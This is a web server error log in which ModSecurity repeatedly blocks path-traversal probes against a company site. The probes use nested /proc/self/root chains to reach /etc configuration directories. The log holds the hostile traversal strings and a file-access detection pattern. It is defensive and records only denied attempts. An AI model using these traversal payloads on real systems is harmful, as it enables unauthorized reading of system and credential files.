[Wed Mar 18 11:49:17.115421 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.241.31:39726] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq7bcdf6f5d65gmYZTf8wAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:49:20.591123 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.241.31:45596] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq7cNY0UrI5A3LftIy6QQAAAYE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 11:49:52.479146 2026] [:error] [pid 30077:tid 140411624429312] [client 74.7.241.31:45610] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq7kPu8EFLIOrSqIpsOwwAAAk4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:50:09.967978 2026] [:error] [pid 15051:tid 140411616036608] [client 74.7.241.31:59826] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq7oSmAPhZkrhU8w4l4hAAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:50:13.305885 2026] [:error] [pid 11816:tid 140411607643904] [client 74.7.243.128:51760] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq7pew_le52K8_3pV3qtQAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:50:18.056232 2026] [:error] [pid 19507:tid 140411649607424] [client 74.7.243.128:46390] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq7qtY0UrI5A3LftIy6cQAAAYs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:50:24.935409 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.241.31:50264] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq7sPu8EFLIOrSqIpsO3AAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:50:31.151278 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.241.31:48232] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq7t9Y0UrI5A3LftIy6egAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 11:50:43.966189 2026] [:error] [pid 15051:tid 140411540502272] [client 74.7.243.128:52630] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq7wSmAPhZkrhU8w4l4pwAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:50:46.953104 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.243.128:48372] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq7xQkwaGbbGflqUZAavgAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:51:12.926394 2026] [mime_magic:error] [pid 30077:tid 140411716749056] (70014)End of file found: [client 57.141.18.52:47426] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 11:51:31.939500 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.241.31:42010] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq78-yqAr6etmhZHNrN7QAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:51:52.941792 2026] [mime_magic:error] [pid 31803:tid 140411540502272] (70014)End of file found: [client 216.73.216.191:12736] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 11:51:54.307604 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.241.31:53986] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq8CuoXxyEfFpUF8f947AAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 11:52:02.237775 2026] [mime_magic:error] [pid 17887:tid 140411716749056] (70014)End of file found: [client 57.141.18.73:48982] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 11:52:06.116837 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.241.31:44076] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq8FtY0UrI5A3LftIy6vAAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:52:13.290850 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.243.128:48374] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq8HQkwaGbbGflqUZAbHAAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:53:07.504318 2026] [:error] [pid 30077:tid 140411616036608] [client 74.7.243.128:60060] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq8U_u8EFLIOrSqIpsPWgAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:53:20.698030 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:33860] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq8YOoXxyEfFpUF8f95LgAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:53:22.014164 2026] [:error] [pid 19507:tid 140411641214720] [client 74.7.243.128:56128] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq8YtY0UrI5A3LftIy64AAAAYw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:53:36.025005 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.243.128:56138] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq8cOoXxyEfFpUF8f95QgAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 11:53:38.170086 2026] [:error] [pid 15051:tid 140411699963648] [client 74.7.243.128:36830] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq8cSmAPhZkrhU8w4l5BAAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 11:53:39.819739 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.243.128:50602] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tenable_tag"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq8c-yqAr6etmhZHNrOjQAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 11:53:40.048871 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.243.128:50602] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq8dOyqAr6etmhZHNrOjgAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
